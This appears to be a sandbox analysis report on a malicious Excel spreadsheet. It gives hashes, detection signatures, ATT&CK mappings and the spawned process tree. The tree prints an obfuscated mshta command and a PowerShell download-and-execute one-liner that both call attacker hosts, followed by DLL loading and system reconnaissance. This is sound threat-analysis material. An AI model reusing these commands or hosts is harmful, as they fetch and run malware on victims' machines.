9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce

General

Target

9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
Size

65KB
MD5

d13888aa7ccb2000c133b0ca9a1bd653
SHA1

a9e3e296c1b75aaee53f93f96d603107a9a6874c
SHA256

9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce
SHA512

209487538b7314b8f0051ced9bd8850c7dcb3f0e5302722fe799a725e067202959484d72613d1c307b2daba7c1db5ccab6cb781b23808ae92f116b0cc70981bd

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://0xc12a24f5/cc.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.42.36.245/PP91.PNG

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1368	3100	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 7 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

32 3632 mshta.exe
36 2288 powershell.exe
38 2288 powershell.exe
46 3216 rundll32.exe
47 3216 rundll32.exe
48 3216 rundll32.exe
51 3216 rundll32.exe
Downloads MZ/PE file
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

1076 rundll32.exe
2464 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

632 3632 WerFault.exe mshta.exe

flow	pid	process
32	3632	mshta.exe
36	2288	powershell.exe
38	2288	powershell.exe
46	3216	rundll32.exe
47	3216	rundll32.exe
48	3216	rundll32.exe
51	3216	rundll32.exe

pid	process
1076	rundll32.exe
2464	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp	rundll32.exe

pid	pid_target	process	target process
632	3632	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1484 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1228 systeminfo.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3100 EXCEL.EXE

pid	process
1484	ipconfig.exe

pid	process
1228	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

WerFault.exepowershell.exerundll32.exe

pid	process
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
2288	powershell.exe
2288	powershell.exe
2288	powershell.exe
3216	rundll32.exe
3216	rundll32.exe
3216	rundll32.exe
3216	rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

WerFault.exepowershell.exe

description pid process

Token: SeDebugPrivilege 632 WerFault.exe
Token: SeDebugPrivilege 2288 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

3100 EXCEL.EXE
3100 EXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	632	WerFault.exe
Token: SeDebugPrivilege	2288	powershell.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE
3100	EXCEL.EXE

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 3100 wrote to memory of 1368	3100	EXCEL.EXE	cmd.exe
PID 3100 wrote to memory of 1368	3100	EXCEL.EXE	cmd.exe
PID 1368 wrote to memory of 3632	1368	cmd.exe	mshta.exe
PID 1368 wrote to memory of 3632	1368	cmd.exe	mshta.exe
PID 3632 wrote to memory of 2288	3632	mshta.exe	powershell.exe
PID 3632 wrote to memory of 2288	3632	mshta.exe	powershell.exe
PID 2288 wrote to memory of 1848	2288	powershell.exe	cmd.exe
PID 2288 wrote to memory of 1848	2288	powershell.exe	cmd.exe
PID 1848 wrote to memory of 1076	1848	cmd.exe	rundll32.exe
PID 1848 wrote to memory of 1076	1848	cmd.exe	rundll32.exe
PID 1848 wrote to memory of 1076	1848	cmd.exe	rundll32.exe
PID 1076 wrote to memory of 2464	1076	rundll32.exe	rundll32.exe
PID 1076 wrote to memory of 2464	1076	rundll32.exe	rundll32.exe
PID 1076 wrote to memory of 2464	1076	rundll32.exe	rundll32.exe
PID 2464 wrote to memory of 1708	2464	rundll32.exe	rundll32.exe
PID 2464 wrote to memory of 1708	2464	rundll32.exe	rundll32.exe
PID 2464 wrote to memory of 1708	2464	rundll32.exe	rundll32.exe
PID 1708 wrote to memory of 3216	1708	rundll32.exe	rundll32.exe
PID 1708 wrote to memory of 3216	1708	rundll32.exe	rundll32.exe
PID 1708 wrote to memory of 3216	1708	rundll32.exe	rundll32.exe
PID 3216 wrote to memory of 1228	3216	rundll32.exe	systeminfo.exe
PID 3216 wrote to memory of 1228	3216	rundll32.exe	systeminfo.exe
PID 3216 wrote to memory of 1228	3216	rundll32.exe	systeminfo.exe
PID 3216 wrote to memory of 1484	3216	rundll32.exe	ipconfig.exe
PID 3216 wrote to memory of 1484	3216	rundll32.exe	ipconfig.exe
PID 3216 wrote to memory of 1484	3216	rundll32.exe	ipconfig.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3100

C:\Windows\SYSTEM32\cmd.exe
cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\mshta.exe
mshta http://0xc12a24f5/cc.html
3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3632 -s 1636
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://193.42.36.245/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
5⤵
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\SysWow64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp",XTdhK
8⤵
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Petwvvgrt\kbus.wbp",DllRegisterServer
9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3216

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
10⤵
- Gathers system information
PID:1228

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
10⤵
- Gathers network information
PID:1484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

5

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Documents\ssd.dll
MD5
94ece97a39d07d3264de94ed36f1fb62

SHA1
6051bc605470b2ac80ea1b9acf9e60431e783a8f

SHA256
c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f

SHA512
3943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d

Download Submit
\Users\Public\Documents\ssd.dll
MD5
94ece97a39d07d3264de94ed36f1fb62

SHA1
6051bc605470b2ac80ea1b9acf9e60431e783a8f

SHA256
c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f

SHA512
3943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d

Download Submit
\Users\Public\Documents\ssd.dll
MD5
94ece97a39d07d3264de94ed36f1fb62

SHA1
6051bc605470b2ac80ea1b9acf9e60431e783a8f

SHA256
c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f

SHA512
3943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d

Download Submit
memory/1076-321-0x0000000000000000-mapping.dmp

Download
memory/1228-354-0x0000000000000000-mapping.dmp

Download
memory/1368-256-0x0000000000000000-mapping.dmp

Download
memory/1484-356-0x0000000000000000-mapping.dmp

Download
memory/1708-338-0x0000000000000000-mapping.dmp

Download
memory/1848-320-0x0000000000000000-mapping.dmp

Download
memory/2288-315-0x000002679E736000-0x000002679E738000-memory.dmp

Filesize
8KB

Download
memory/2288-273-0x0000000000000000-mapping.dmp

Download
memory/2288-278-0x000002679E730000-0x000002679E732000-memory.dmp

Filesize
8KB

Download
memory/2288-279-0x000002679E733000-0x000002679E735000-memory.dmp

Filesize
8KB

Download
memory/2288-280-0x000002679E770000-0x000002679E792000-memory.dmp

Filesize
136KB

Download
memory/2288-299-0x000002679ED50000-0x000002679ED8C000-memory.dmp

Filesize
240KB

Download
memory/2288-310-0x000002679EE10000-0x000002679EE86000-memory.dmp

Filesize
472KB

Download
memory/2464-326-0x0000000000000000-mapping.dmp

Download
memory/3100-125-0x0000016664EC0000-0x0000016664EC2000-memory.dmp

Filesize
8KB

Download
memory/3100-124-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp

Filesize
64KB

Download
memory/3100-122-0x0000016664EC0000-0x0000016664EC2000-memory.dmp

Filesize
8KB

Download
memory/3100-118-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp

Filesize
64KB

Download
memory/3100-123-0x0000016664EC0000-0x0000016664EC2000-memory.dmp

Filesize
8KB

Download
memory/3100-121-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp

Filesize
64KB

Download
memory/3100-120-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp

Filesize
64KB

Download
memory/3100-119-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp

Filesize
64KB

Download
memory/3216-343-0x0000000000000000-mapping.dmp

Download
memory/3216-355-0x0000000005320000-0x0000000005338000-memory.dmp

Filesize
96KB

Download
memory/3632-257-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads